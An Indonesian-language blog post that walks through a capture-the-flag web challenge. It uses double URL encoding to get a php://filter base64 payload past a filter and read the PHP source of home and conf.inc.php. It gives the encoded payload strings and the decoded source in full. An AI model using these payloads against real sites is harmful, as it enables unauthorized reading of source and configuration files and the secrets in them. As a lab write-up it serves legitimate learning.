Double Encoding adalah Teknik serangan ini terdiri dari menyandikan parameter permintaan pengguna dua kali dalam format heksadesimal untuk memintas kontrol keamanan atau menyebabkan perilaku tak terduga dari aplikasi.dengan %25 + 2F (/ yang diencode ke Hexadesimal) = %252F.
pertama saya akan mengencode beberapa symbol:
/ = %252F
. = %252E
: = %253A
- = %252D
= = %253Dselanjutnya membuat payload engan php://filter, seperti ini:
php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dhomesaya akan coba melihat source home, setelah itu enter maka akan muncul enkode base64, lalu saya decode dan hasilnya:
<?php include("conf.inc.php"); ?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>J. Smith - Home</title>
</head>
<body>
<?= $conf['global_style'] ?>
<nav>
<a href="index.php?page=home" class="active">Home</a>
<a href="index.php?page=cv">CV</a>
<a href="index.php?page=contact">Contact</a>
</nav>
<div id="main">
<?= $conf['home'] ?>
</div>
</body>
</html>fokus pada conf.inc.php kemungkinan flag terdapat disana jadi saya pakai payload:
php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dconfsetelah itu enter maka akan muncul enkode base64, lalu didecode, hasilnya:
fokus pada bagian flag itu adalah flagnya.<?php$conf = ["flag" => "silahkan dicoba","home" => '<h2>Welcome</h2><div>Welcome on my personal website !</div>',
Referensi:
https://www.owasp.org/index.php/Double_Encoding
http://www.ids-sax2.com/Knowledgebase/NetworkSecurity/Double-Encoding.htm
https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
https://codebeautify.org/hex-string-converter
No comments:
Post a Comment